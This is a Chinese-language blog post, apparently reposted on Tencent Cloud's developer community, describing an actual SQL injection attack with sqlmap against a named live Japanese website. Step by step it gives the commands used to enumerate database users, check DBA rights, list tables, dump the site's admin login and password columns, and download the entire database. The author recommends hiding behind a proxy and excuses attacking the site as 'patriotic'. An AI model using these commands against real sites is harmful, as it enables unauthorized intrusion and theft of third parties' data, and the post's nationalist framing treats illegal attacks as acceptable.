学习
实践
活动
工具
TVP
写文章

sqlmap入侵小日本网站实战

今天的主角:

网址是:https://henecia.jp/goodsnews/detail.php?nid=63

这个页面有一个注入点,可以用sqlmap进行注入攻击。

攻击机kali:

kali中内置了sqlmap工具,所以这次测试就在kali中进行。

kali的安装可以看我以前的推送,我记得有一篇推送是教大家怎么安装kali系统的。

攻击过程:

1.查看基本信息命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“

结果:

2.查看当前用户

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —users -v 0

结果:

3.查看当前用户是否有dba权限:

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —is-dba -v 1

结果:

4.查看当前用户密码:

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —passwords -v 0

结果:

没有查出来,可能是因为用户没有dba权限

5.查看所有存在的库:

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dbs -v 0

结果:

6.爆库下的表:

这次我们爆henecia表

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —tables -D “henecia”

结果:

7.爆TM_ADMIN_MEMBER表字段

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —columns -D “henecia” -T “TM_ADMIN_MEMBER”

结果:

8.爆字段内容:

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dump -D “henecia” -T “TM_ADMIN_MEMBER” -C “login_uid,login_pwd”

结果:

接下来就是找后台登陆了,可以使用御剑扫一扫,不过这个后台没找出来。

9.脱裤:

命令:

sqlmap -u “http://henecia.jp/goodsnews/detail.php?nid=63“ —dump-all -D henecia

结果:

脱下来的数据会保存到本地的文件夹下,在脱裤完成后会提示保存的位置

从这张图中可以看见正在下载网站的数据库,由于数据库较大,这里就不放结果了。

总结:

大家想自己做测试的时候要注意一些,最好挂上代理,就像这个一样就行

不过,大家尽量还是不要攻击别人的网站,这个是日本的一个网站,测试一下,就当爱国了

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180731G1Y0DZ00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码关注腾讯云开发者

领取腾讯云代金券